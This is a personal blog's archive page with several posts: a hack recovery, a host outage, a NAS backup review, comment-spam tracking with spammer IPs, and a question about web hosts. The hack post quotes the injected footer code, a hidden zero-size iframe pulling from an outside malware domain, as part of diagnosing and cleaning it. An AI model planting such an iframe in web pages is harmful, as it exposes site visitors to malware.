Tag Archive: MySQL

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Site Outage

Strangely post on September 7th, 2011
Posted in Internet Tags: , , , , , , , , , , , , ,

My host, Site5.com, has kindly told me that this site (and others of mine) will be off-line from tonight for 3 hours from 07 Sep 2011 23:00 GMT/UTC until 08 Sep 2011 02:00 GMT/UTC.  (I’ve had to convert this from the email which is CDT specific…)

This is due to an upgrade of the MySQL databases to something called Percona, which is a new one on me! Checking it out, it is a custom install of MySQL, with extra management software clagged on.

Related External Links

Related Posts:

Comments are closed

What is the Best Backup for Windows in a Small Home or Office?

What is the Best Backup for Windows in a Small Home or Office?

Which Windows Backup?  A History.

Over the years I’ve tried many systems for backing up crucial Windows data.  Currently for small-scale backups I use the ubiquitous and almost bullet-proof flash drives, my current one tipping the scales at 8Gb.  But for major backups, as the years have passed, I’ve used;

  1. Floppy discs – 1.4Mb
  2. Iomega Zip discs – 100Mb
  3. CDRW – 650Mb
  4. DVD-R – 4.7Gb
  5. Western Digital My Book Home Edition – 1Tb

They all had their problems and limitations.  The last one looked good with Firewire, USB2, ethernet  & eSATA connections – but it overheated and broke…..

Best Windows Backup!

My current system is from Synology and is a “DS210j – Budget-friendly 2-bay NAS server for Home and Small Business”

See: http://www.synology.com/enu/products/DS210j/index.php

I can heartily recommend the thing.  It has so much gubbins within it and far exceeds my limited expectations.  I installed two green 2Tb drives from Western Digital  in mirrored RAID for security and use the auto-backup software provided as well as Windows’ own.  This is extremely relevant for the large number of hits I’ve had to this posting where a major part of the problem is the time taken to do a backup!  In my case, the 750Gb just takes a few hours to copy across the Gigabit speed ethernet that the unit can use.

Addendum June 2011: The tool is a seriously capable bit of kit and I cannot recommend it enough. Get one!

It does everything it says on the tin, and more!  The whole thing cost me about 200 quid, plus an hour of my time to install.

Even its firewall is more configurable than any router I’ve used!  It can be used as a server for FTP or the web.  It comes with software for a host of things that mimic Flikr etc but without all the privacy or security issues inherent in off-line storage.  It’ll also run with any operating system because it itself is a mini-linux installation as it is,  and includes Windows, Apple and Linux applications.
Check it out, straight from their overview page:

Build Your Entertainment Center

Download Station 2 functions as a 24×7 BitTorrent, FTP, HTTP, eMule, and NZB download center. RapidShare and RSS download are now supported.

DLNA Compliant Media Sever ensures compatibility and interoperability between Disk Station and a wide range of DLNA-certified home devices.

iTunes Server provides an easy way to share music and videos with other iTunes clients within the local network. You can create playlists with songs that match the criteria you specified, and best of all, iTunes will update these playlists automatically as you add or delete songs.

Audio Station supports music, Internet radio stations, and iPod playback with connected USB speakers. Web-streaming mode allows your music to be shared with multiple users over the Internet.

Back Up Your Precious Data

DSM 2.2 offers comprehensive solutions for you to back up data stored on Disk Station or your desktop computer to the Disk Station.

Server backup includes two alternatives: Network Backup and Local Backup. Both allow you to back up data in the shared folders and databases. Incremental backup option and flexible schedules are available. All can be easily configured with a step-by-step wizard.

Desktop backup provides Windows PC users with the Synology Data Replicator 3 for backing up desktop data, Outlook, and Outlook Express emails to their Disk Station by choosing one of the three backup modes: Immediate, Sync, and Scheduled backup, while Mac OS X users can use Apple Time Machine backup application to back up their critical data to Disk Station.

USBCopy allows you to quickly back up your data from an USB storage device such as an USB flash or USB card reader to the Disk Station with just one single touch on the front-panel Copy button.

Enrich Your Web Presence

Photo Station 3 simplifies photo, video, and blog sharing over the Internet. The flexibility of photo theme customization, blog layout arrangement, visitor’s privilege setting, RSS feed, and the dazzling 3-dimentional photo browsing with Cooliris make Photo Station 3 your state-of-the-art lifestyle sharing center on the Internet.

Web Station with built-in PHP+MySQL allows users to publish their own websites or install numerous popular open-source programs.

Access With Your iPhone/Mobile Device

The iPhone App DS audio allows Disk Station users to stream music stored on Disk Station with their iPhone/iPod® touch where Internet access is available, while DS photo allows uploading photos from the iPhone/iPod® touch to their Disk Station.

Users with a mobile device running on Windows Mobile® 6.0, iPhone OS 2.2.1 onward, or Symbian OS 9.1 can log on their Disk Station to view photos with Mobile Photo Station and read supported file formats with Mobile File Station where Internet access is available.

Eco Friendly

Eco Friendly

Synology Disk Station is designed and developed perpetually with the concept of energy saving. Compared with average PC counterparts, Synology Disk Station consumes a relatively low amount of power and has the HDDs hibernate when not in use. This not only helps to save energy but also extends the lifespan of the hard disk.

Synology Disk Station truly earns the title of “green product” because of the unique Scheduled Power On/Off feature, and the smart fan design effectively cools down the system with minimum power consumption, yet keeps the system quiet on operation.

Finally, all Synology products are produced with RoHS compliant parts and packed with recyclable packing materials. Synology recognizes its responsibility as a global citizen and is continually working to reduce the environmental impact of the products we create.

Related Posts:

Comments are closed

Pligg Comment Spam

Introduction

An unfortunate consequence of posting stuff online is that you enable your ‘work’, ‘your words of wisdom’, your ‘copyright’ or your petty scrawlings (choose which you think is the most appropriate), to the world as as such, it’s freely copyable.

My website is proudly running on WordPress sat on a standard shared hosting LAMP installation.  Millions do likewise as it’s cheap and effective and has an inbuilt SEO optimisation function that if you don’t abuse it, it actually works!

Comment spam is a pain but the various plugins and lockdowns block most of the crap.

Except last night I had two weird ones within half-an-hour of each other, that came from Pligg websites.  I’d never heard of Pligg until then, but it’s another example of CMS software.

The way that the comment spam made it as far as my filters (as most is dumped without my intervention) is that the websites seemed to do everything correctly to get proper pingbacks – except make sense!!!

Green Tea Fat Burner – Greenteafatburner.info

This one appeared against the posting  watch-out-for-the-scam-double-bluff, which is highly ironic!  It’s WHOIS entry is ‘protected’ by WhoisGuard – which is to be expected.  It came from IP 67.214.185.157

Weak Bladder Info – Weakbladder.info

This one appeared against the posting  rapidshare-wordpress-comment-spam, which is even more ironic, if anything!  It’s WHOIS entry is ‘protected’ by WhoisGuard – again to be expected.  It came from IP 209.31.180.25

Details

Both sites strip out text from websites (like mine), turn the text into postings and even apply ‘votes’ to them.  Sometimes after 3 mins!  The formulaic nature of the design is revealed by the ‘What is the ****** site all about?’ blurb down the side.    This is one, the other is almost identical.

The Weak Bladder site is a place for out community members to add resources and information that are related to Weak Bladder into one spot. We collect all of the relevent information from around the web, post it here, in the hopes that having a single resource will all us, and you, to save time when researching this topic. If you’d like to help, then register for a free membership and start contributing as an active community member.

Go for it! (not)

Postscript – later today!

Yay!  Got another.  Same blurb etc IP 76.73.41.92  This time it’s jointpainreliefs.info, and I quote;

The Joint Pain Relief site is a place where we collect information about joint pain, and how to overcome it, in one spot. We are a community dedicated to bringing you the best resources from around the web. If you’d like to join our community and help, signup! It’s free…

Perhaps I didn’t make it clear before, but the ‘joint pain reliefs’ contains everything…except…joint pain reliefs!  It appeared on my highly related (not) post Rapidshare WordPress Comment Spam.   What is it about this post that attracts the comment spammers?  Surely they’re not going for the phrase ‘Comment Spam’?.  And don’t call me surely!

Post-Postscript 9 June 2009

I’ve got another two almost identical comment spam/content scraping hits against the same post Rapidshare WordPress Comment Spam!!!  What is their game…

So I’m going to make a little list of them now.  Also, I’m starting a competition to guess the next bizarre subject matter of the Pligg based website.  My guess is eyelashmiteproblem.info, but I could be wrong …  It could be itchyarse.info or something.  It won’t be from these IP addresses though as I’ve blocked them.

So far, I have:

Website IP Address
Greenteafatburner.info 67.214.185.157
Weakbladder.info 209.31.180.25
jointpainreliefs.info 76.73.41.92
menopausereliefsite.info 67.214.185.157
toenailfungusite.info 67.214.185.157

I think it’s time I started adding a few blocks to my .htaccess file, ha ha. If you don’t know how to do this, read here.

Post-PostScript 14 June 2009

The next entry in the Pligg wall of shame came this morning from:

OnlyOutdoorRugs.info at IP 204.124.181.57   This is a US based host.  It targetted this wholly unrelated post of mine, Chatelus Malvaleix on Google Earth Tour de France Map

I’m now left wondering what to do with an Outdoor Rugs, especially when it rains!  The world has gone mad.  Rugs for outside has to be the height of decadence – unless they are normal rugs that you take outside to sit on. But then they’d be indoor rugs. So outdoor rugs must be for dry countries where it never rains.  My brain hurts.

Related Posts:

Best and Most Reliable Web Hosting?

Strangely post on March 21st, 2009
Posted in Internet Tags: , , , , , , , , , ,

@AmazonI’m looking at getting a new host for (at some of) my domains. ixWebHosting who I’ve used for some time, keep falling over and I’m getting a bit fed up with apologetic support ticket replies and no change in service.  For about a year they were quite reasonable but since the server move out of Hopkinsville service reliablity (a.k.a. ‘uptime’) has gone down.

@AmazonSo in these credit-crunched times, I’m going to let my money do the talking now, and move.

Has anyone got any suggestions?

There are zillions around and each time I check, people say good and bad about all of them!  I’m looking at both sides of the Atlantic this time.

Related Posts:

Comments are closed

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me